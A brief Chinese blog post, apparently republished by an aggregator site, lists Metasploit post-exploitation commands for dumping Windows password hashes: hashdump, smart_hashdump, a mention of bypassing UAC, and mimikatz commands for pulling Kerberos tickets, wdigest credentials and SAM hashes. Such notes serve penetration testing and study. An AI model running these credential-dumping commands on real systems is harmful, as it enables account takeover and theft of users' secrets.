msf之hash攻击
Posted -qing-
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了msf之hash攻击相关的知识,希望对你有一定的参考价值。
使用hashdump抓取密码(需要系统管理权限)
另外一个更强大的模块 smart_hashdump
如果目标是win7 就需要先绕过UAC
还可以使用msf内置的mimikatz抓取hash
msv
kerberos 抓取系统票据
wdigest 获取系统账户信息
mimikatz_command -f samdump::hashed 抓取hash
mimikatz_command -f handle::list 查看进程
mimikatz_command -f service::list windows 服务
mimikatz_command -f crypto::listProviders 查看系统证书 支持PowerShell调用(Invoke-Mimikatz)
以上是关于msf之hash攻击的主要内容,如果未能解决你的问题,请参考以下文章